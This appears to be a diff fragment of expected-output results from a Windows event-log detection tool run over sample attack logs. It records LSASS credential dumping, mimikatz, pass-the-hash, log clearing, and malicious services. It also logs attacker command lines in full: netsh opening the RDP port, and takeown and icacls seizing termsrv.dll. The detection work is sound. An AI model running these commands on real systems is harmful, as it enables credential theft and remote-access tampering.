+2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32 | IP Addr: ::1 | LID: 0x27df8,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx
+2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32 | IP Addr: ::1 | LID: 0x27df8,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx
+2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32 | IP Addr: ::1 | LID: 0x27df8,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx
+2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32 | IP Addr: ::1 | LID: 0x27df8,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx
+2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows | IP Addr: ::1 | LID: 0x27df8,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx
+2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows | IP Addr: ::1 | LID: 0x27df8,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx
+2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows | IP Addr: ::1 | LID: 0x27df8,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx
+2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows | IP Addr: ::1 | LID: 0x27df8,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx
+2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\RemComSvc.exe | IP Addr: ::1 | LID: 0x27df8,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx
+2019-02-17 03:19:18.522 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\RemComSvc.exe | IP Addr: ::1 | LID: 0x27df8,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx
+2019-03-03 18:20:28.621 +09:00,WIN-77LTAPHIQ1R.example.corp,7045,high,Persis,Suspicious Service Installed,Svc: spoolfool | Path: cmd.exe | Account: LocalSystem | Start Type: auto start,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_Remote_Service02_7045.evtx
+2019-03-03 18:20:28.621 +09:00,WIN-77LTAPHIQ1R.example.corp,7045,high,Persis,Malicious Service Possibly Installed,Svc: spoolfool | Path: cmd.exe,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_Remote_Service02_7045.evtx
+2019-03-03 18:20:28.621 +09:00,WIN-77LTAPHIQ1R.example.corp,7045,info,,New Service Installed,Name: spoolfool | Path: cmd.exe | Account: LocalSystem | Start Type: auto start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_Remote_Service02_7045.evtx
+2019-03-03 18:24:24.699 +09:00,WIN-77LTAPHIQ1R.example.corp,7045,high,Persis,Suspicious Service Installed,Svc: spoolsv | Path: cmd.exe | Account: LocalSystem | Start Type: auto start,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_Remote_Service02_7045.evtx
+2019-03-03 18:24:24.699 +09:00,WIN-77LTAPHIQ1R.example.corp,7045,high,Persis,Malicious Service Possibly Installed,Svc: spoolsv | Path: cmd.exe,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_Remote_Service02_7045.evtx
+2019-03-03 18:24:24.699 +09:00,WIN-77LTAPHIQ1R.example.corp,7045,info,,New Service Installed,Name: spoolsv | Path: cmd.exe | Account: LocalSystem | Start Type: auto start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_Remote_Service02_7045.evtx
+2019-03-18 04:09:41.328 +09:00,PC04.example.corp,11,info,,File Created,Path: C:\Users\IEUser\Desktop\lsass.exe_190317_120941.dmp | Process: C:\Users\IEUser\Desktop\procdump.exe | PID: 1856 | PGUID: 365ABB72-9B75-5C8E-0000-0010013F1200,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_lsass_memdump.evtx
+2019-03-18 04:09:41.328 +09:00,PC04.example.corp,10,low,,Process Access,Src Process: C:\Users\IEUser\Desktop\procdump.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 1856 | Src PGUID: 365ABB72-9B75-5C8E-0000-0010013F1200 | Tgt PID: 476 | Tgt PGUID: 365ABB72-0886-5C8F-0000-001030560000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_lsass_memdump.evtx
+2019-03-18 04:09:41.328 +09:00,PC04.example.corp,11,high,CredAccess,LSASS Memory Dump File Creation,,rules/sigma/file_event/sysmon_lsass_memory_dump_file_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_lsass_memdump.evtx
+2019-03-18 04:09:41.328 +09:00,PC04.example.corp,11,high,CredAccess,LSASS Process Memory Dump Files,,rules/sigma/file_event/file_event_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_lsass_memdump.evtx
+2019-03-18 04:09:41.328 +09:00,PC04.example.corp,10,high,CredAccess,LSASS Memory Access by Tool Named Dump,,rules/sigma/process_access/sysmon_lsass_memdump_indicators.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_lsass_memdump.evtx
+2019-03-18 04:10:03.991 +09:00,PC04.example.corp,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\lsass (2).DMP | Process: C:\Windows\system32\taskmgr.exe | PID: 3576 | PGUID: 365ABB72-9B85-5C8E-0000-0010C4CC1200,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_lsass_memdump.evtx
+2019-03-18 04:10:03.991 +09:00,PC04.example.corp,10,low,,Process Access,Src Process: C:\Windows\system32\taskmgr.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 3576 | Src PGUID: 365ABB72-9B85-5C8E-0000-0010C4CC1200 | Tgt PID: 476 | Tgt PGUID: 365ABB72-0886-5C8F-0000-001030560000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_lsass_memdump.evtx
+2019-03-18 04:10:03.991 +09:00,PC04.example.corp,11,high,CredAccess,LSASS Memory Dump File Creation,,rules/sigma/file_event/sysmon_lsass_memory_dump_file_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_lsass_memdump.evtx
+2019-03-18 04:10:03.991 +09:00,PC04.example.corp,11,high,CredAccess,LSASS Process Memory Dump Files,,rules/sigma/file_event/file_event_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_lsass_memdump.evtx
+2019-03-18 04:26:42.116 +09:00,PC04.example.corp,1102,high,Evas,Security Log Cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/net_share_drive_5142.evtx
+2019-03-18 04:37:11.661 +09:00,PC04.example.corp,10,low,,Process Access,Src Process: C:\Users\IEUser\Desktop\mimikatz_trunk\Win32\mimikatz.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1010 | Src PID: 3588 | Src PGUID: 365ABB72-A1E3-5C8E-0000-0010CEF72200 | Tgt PID: 476 | Tgt PGUID: 365ABB72-0886-5C8F-0000-001030560000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_lsass_mimikatz_sekurlsa_logonpasswords.evtx
+2019-03-18 04:37:11.661 +09:00,PC04.example.corp,10,high,CredAccess,Suspicious GrantedAccess Flags on LSASS Access,,rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_lsass_mimikatz_sekurlsa_logonpasswords.evtx
+2019-03-18 04:37:11.661 +09:00,PC04.example.corp,10,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_lsass_mimikatz_sekurlsa_logonpasswords.evtx
+2019-03-18 05:17:44.537 +09:00,PC04.example.corp,11,info,,File Created,Path: C:\Users\IEUser\Desktop\RDPWRA~1.2\install.bat | Process: C:\Windows\Explorer.EXE | PID: 3884 | PGUID: 365ABB72-A965-5C8E-0000-0010D9100400,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
+2019-03-18 05:17:44.637 +09:00,PC04.example.corp,11,info,,File Created,Path: C:\Users\IEUser\Desktop\RDPWRA~1.2\RDPCheck.exe | Process: C:\Windows\Explorer.EXE | PID: 3884 | PGUID: 365ABB72-A965-5C8E-0000-0010D9100400,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
+2019-03-18 05:17:44.797 +09:00,PC04.example.corp,11,info,,File Created,Path: C:\Users\IEUser\Desktop\RDPWRA~1.2\RDPConf.exe | Process: C:\Windows\Explorer.EXE | PID: 3884 | PGUID: 365ABB72-A965-5C8E-0000-0010D9100400,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
+2019-03-18 05:17:45.478 +09:00,PC04.example.corp,11,info,,File Created,Path: C:\Users\IEUser\Desktop\RDPWRA~1.2\RDPWInst.exe | Process: C:\Windows\Explorer.EXE | PID: 3884 | PGUID: 365ABB72-A965-5C8E-0000-0010D9100400,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
+2019-03-18 05:17:45.628 +09:00,PC04.example.corp,11,info,,File Created,Path: C:\Users\IEUser\Desktop\RDPWRA~1.2\uninstall.bat | Process: C:\Windows\Explorer.EXE | PID: 3884 | PGUID: 365ABB72-A965-5C8E-0000-0010D9100400,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
+2019-03-18 05:17:45.648 +09:00,PC04.example.corp,11,info,,File Created,Path: C:\Users\IEUser\Desktop\RDPWRA~1.2\update.bat | Process: C:\Windows\Explorer.EXE | PID: 3884 | PGUID: 365ABB72-A965-5C8E-0000-0010D9100400,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
+2019-03-18 05:17:52.949 +09:00,PC04.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\install.bat"" | Process: C:\Windows\System32\cmd.exe | User: PC04\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x3c004 | PID: 3272 | PGUID: 365ABB72-AB70-5C8E-0000-0010781D0A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
+2019-03-18 05:17:52.979 +09:00,PC04.example.corp,1,info,,Process Created,"Cmd: ""C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\RDPWInst"" -i -o | Process: C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\RDPWInst.exe | User: PC04\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\install.bat"" | LID: 0x3c004 | PID: 3700 | PGUID: 365ABB72-AB70-5C8E-0000-0010DF1F0A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
+2019-03-18 05:17:52.979 +09:00,PC04.example.corp,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
+2019-03-18 05:18:05.086 +09:00,PC04.example.corp,13,medium,Persis | PrivEsc,ServiceDll Modification,,rules/sigma/registry_event/win_re_set_servicedll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
+2019-03-18 05:18:05.086 +09:00,PC04.example.corp,13,high,Evas,RDP Sensitive Settings Changed,,rules/sigma/registry_event/sysmon_rdp_settings_hijack.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
+2019-03-18 05:18:09.282 +09:00,PC04.example.corp,13,high,Evas,RDP Registry Modification,,rules/sigma/registry_event/sysmon_rdp_registry_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
+2019-03-18 05:18:09.282 +09:00,PC04.example.corp,13,high,Evas,RDP Sensitive Settings Changed,,rules/sigma/registry_event/sysmon_rdp_settings_hijack.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
+2019-03-18 05:18:09.312 +09:00,PC04.example.corp,1,info,,Process Created,"Cmd: netsh advfirewall firewall add rule name=""Remote Desktop"" dir=in protocol=tcp localport=3389 profile=any action=allow | Process: C:\Windows\System32\netsh.exe | User: PC04\IEUser | Parent Cmd: ""C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\RDPWInst"" -i -o | LID: 0x3c004 | PID: 3696 | PGUID: 365ABB72-AB81-5C8E-0000-001024960C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
+2019-03-18 05:18:09.312 +09:00,PC04.example.corp,1,medium,Evas,Netsh Port or Application Allowed,,rules/sigma/process_creation/proc_creation_win_netsh_fw_add.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
+2019-03-18 05:18:09.312 +09:00,PC04.example.corp,1,high,Evas,Netsh RDP Port Opening,,rules/sigma/process_creation/proc_creation_win_netsh_allow_port_rdp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
+2019-03-18 05:18:09.643 +09:00,PC04.example.corp,1,info,,Process Created,"Cmd: C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {995C996E-D918-4a8c-A302-45719A6F4EA7} -Embedding | Process: C:\Windows\System32\rundll32.exe | User: PC04\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x3c004 | PID: 3892 | PGUID: 365ABB72-AB81-5C8E-0000-00102E9E0C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
+2019-03-18 05:18:12.096 +09:00,PC04.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 220 | Process: C:\Windows\System32\UI0Detect.exe | User: PC04\IEUser | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x3c004 | PID: 600 | PGUID: 365ABB72-AB84-5C8E-0000-00109EAD0C00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
+2019-03-18 05:20:14.512 +09:00,PC04.example.corp,1,info,,Process Created,"Cmd: ""C:\Users\IEUser\Desktop\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch-x86.exe"" | Process: C:\Users\IEUser\Desktop\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch-x86.exe | User: PC04\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x3c004 | PID: 4024 | PGUID: 365ABB72-ABFE-5C8E-0000-00105A560D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
+2019-03-18 05:20:14.512 +09:00,PC04.example.corp,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
+2019-03-18 05:20:17.907 +09:00,PC04.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\takeown.exe"" /f C:\Windows\System32\termsrv.dll | Process: C:\Windows\System32\takeown.exe | User: PC04\IEUser | Parent Cmd: ""C:\Users\IEUser\Desktop\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch-x86.exe"" | LID: 0x3c004 | PID: 3708 | PGUID: 365ABB72-AC01-5C8E-0000-001011690D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
+2019-03-18 05:20:17.917 +09:00,PC04.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\icacls.exe"" C:\Windows\System32\termsrv.dll /grant %%username%%:F | Process: C:\Windows\System32\icacls.exe | User: PC04\IEUser | Parent Cmd: ""C:\Users\IEUser\Desktop\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch-x86.exe"" | LID: 0x3c004 | PID: 3536 | PGUID: 365ABB72-AC01-5C8E-0000-0010296C0D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
+2019-03-18 05:20:17.917 +09:00,PC04.example.corp,1,medium,Evas,File or Folder Permissions Modifications,,rules/sigma/process_creation/proc_creation_win_file_permission_modifications.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
+2019-03-18 05:20:17.927 +09:00,PC04.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\icacls.exe"" C:\Windows\System32\termsrv.dll /grant *S-1-1-0:(F) | Process: C:\Windows\System32\icacls.exe | User: PC04\IEUser | Parent Cmd: ""C:\Users\IEUser\Desktop\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch-x86.exe"" | LID: 0x3c004 | PID: 3652 | PGUID: 365ABB72-AC01-5C8E-0000-0010656E0D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
+2019-03-18 05:20:17.927 +09:00,PC04.example.corp,1,medium,Evas,File or Folder Permissions Modifications,,rules/sigma/process_creation/proc_creation_win_file_permission_modifications.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
+2019-03-18 05:22:59.399 +09:00,PC04.example.corp,13,high,Persis,Changing RDP Port to Non Standard Number,,rules/sigma/registry_event/win_re_change_rdp_port.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
+2019-03-18 05:23:12.188 +09:00,PC04.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 220 | Process: C:\Windows\System32\UI0Detect.exe | User: PC04\IEUser | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x3c004 | PID: 2972 | PGUID: 365ABB72-ACB0-5C8E-0000-001085D50D00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
+2019-03-18 05:43:12.784 +09:00,PC04.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 220 | Process: C:\Windows\System32\UI0Detect.exe | User: PC04\IEUser | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x3c004 | PID: 136 | PGUID: 365ABB72-B160-5C8E-0000-0010253D1500,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_13_keylogger_directx.evtx
+2019-03-18 05:43:16.309 +09:00,PC04.example.corp,1,info,,Process Created,Cmd: C:\Windows\System32\slui.exe -Embedding | Process: C:\Windows\System32\slui.exe | User: PC04\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x3c004 | PID: 3312 | PGUID: 365ABB72-B164-5C8E-0000-0010543F1500,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_13_keylogger_directx.evtx
+2019-03-18 20:06:25.485 +09:00,PC01.example.corp,1102,high,Evas,Security Log Cleared,User: user01,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_4624_mimikatz_sekurlsa_pth_source_machine.evtx
+2019-03-18 20:06:29.911 +09:00,PC01.example.corp,4624,info,,Logon Type 9 - NewCredentials,User: user01 | Computer:  | IP Addr: ::1 | LID: 0x4530f0f | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-9-NewInteractive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_4624_mimikatz_sekurlsa_pth_source_machine.evtx
+2019-03-18 20:06:29.911 +09:00,PC01.example.corp,4672,info,,Admin Logon,User: user01 | LID: 0x4530f0f,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_4624_mimikatz_sekurlsa_pth_source_machine.evtx
+2019-03-18 20:06:29.911 +09:00,PC01.example.corp,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_4624_mimikatz_sekurlsa_pth_source_machine.evtx
+2019-03-18 20:06:29.911 +09:00,PC01.example.corp,4624,high,LatMov,Successful Overpass the Hash Attempt,,rules/sigma/builtin/security/win_overpass_the_hash.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_4624_mimikatz_sekurlsa_pth_source_machine.evtx
+2019-03-18 20:27:00.438 +09:00,PC01.example.corp,1102,high,Evas,Security Log Cleared,User: user01,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMIC_4648_rpcss.evtx
+2019-03-18 20:27:23.231 +09:00,PC01.example.corp,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: user01 | Target User: administrator | IP Address: - | Process: C:\Windows\System32\svchost.exe | Target Server: RPCSS/WIN-77LTAPHIQ1R.example.corp,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMIC_4648_rpcss.evtx
+2019-03-18 20:27:23.261 +09:00,PC01.example.corp,4648,medium,PrivEsc | LatMov,Explicit Logon: Suspicious Process,Src User: user01 | Tgt User: administrator | IP Addr: - | Process: C:\Windows\System32\wbem\WMIC.exe | Tgt Svr: host/WIN-77LTAPHIQ1R.example.corp,rules/hayabusa/default/alerts/Security/4648_ExplicitLogonSuspiciousProcess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMIC_4648_rpcss.evtx
+2019-03-18 20:27:23.261 +09:00,PC01.example.corp,4648,medium,LatMov,Suspicious Remote Logon with Explicit Credentials,,rules/sigma/builtin/security/win_susp_logon_explicit_credentials.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMIC_4648_rpcss.evtx
+2019-03-18 20:27:23.271 +09:00,PC01.example.corp,4648,medium,PrivEsc | LatMov,Explicit Logon: Suspicious Process,Src User: user01 | Tgt User: administrator | IP Addr: - | Process: C:\Windows\System32\wbem\WMIC.exe | Tgt Svr: WIN-77LTAPHIQ1R.example.corp,rules/hayabusa/default/alerts/Security/4648_ExplicitLogonSuspiciousProcess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMIC_4648_rpcss.evtx
+2019-03-18 20:27:23.271 +09:00,PC01.example.corp,4648,medium,LatMov,Suspicious Remote Logon with Explicit Credentials,,rules/sigma/builtin/security/win_susp_logon_explicit_credentials.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMIC_4648_rpcss.evtx
+2019-03-18 23:23:22.264 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
